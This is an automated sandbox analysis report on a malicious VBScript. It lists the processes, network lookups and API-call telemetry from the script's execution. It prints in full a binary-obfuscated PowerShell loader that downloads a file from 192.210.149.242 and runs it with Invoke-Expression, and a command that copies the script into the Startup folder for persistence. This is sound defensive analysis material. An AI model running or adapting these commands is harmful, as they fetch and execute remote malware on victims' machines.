Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 20, 2022, 10:07 a.m.	May 20, 2022, 10:09 a.m.

Size	2.3KB
Type	ASCII text, with CRLF line terminators
MD5	`f2fd3e3b8ea581fef8c483c2dad1546d`
SHA256	`0e38680b1f8b095599da5e1e330c91c347d9750348fe9b2e3606990cfb25e42a`
CRC32	`96BB9456`
ssdeep	`48:c28BNPUNxGEObqrnJwWDJs4BJQxn86OQ168h26+0qIe/IzPL:cNBSNgENrnq4BJa86OQ26+0qIsIzPL`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\edi.vbs
2772
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110001,00110100,00111001,00101110,00110010,00110100,00110010,00101111,01101110,01101111,01101011,01100101,01111001,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))|P
  3060
  - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    2492
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'
  788

Name	Response	Post-Analysis Lookup
geoplugin.net	A 178.237.33.50	178.237.33.50
google.com	A 142.251.42.142	172.217.161.78
eter101.dvrlists.com	A 79.134.225.82	79.134.225.82

IP Address	Status	Action
142.251.42.142	Active	Moloch
164.124.101.2	Active	Moloch
178.237.33.50	Active	Moloch
192.210.149.242	Active	Moloch
79.134.225.82	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49173 79.134.225.82:2050	None	None	None

Queries for the computername (14 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 20, 2022, 10:07 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 20, 2022, 10:07 a.m.			0	0
IsDebuggerPresent May 20, 2022, 10:07 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 89 events)

Time & API	Arguments	Status	Return
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565d50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565e90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005661d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00566110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00540218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00540798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 20, 2022, 10:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00540798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 20, 2022, 10:07 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://192.210.149.242/nokey.txt
suspicious_features	Connection to IP address	suspicious_request	GET http://192.210.149.242/favicon.ico
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://192.210.149.242/nokey.jpg
suspicious_features	GET method with no useragent header	suspicious_request	GET http://geoplugin.net/json.gp

Performs some HTTP requests (4 events)

request	GET http://192.210.149.242/nokey.txt
request	GET http://192.210.149.242/favicon.ico
request	GET http://192.210.149.242/nokey.jpg
request	GET http://geoplugin.net/json.gp

Allocates read-write-execute memory (usually to unpack itself) (50 out of 323 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 2772 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a78000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 3060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
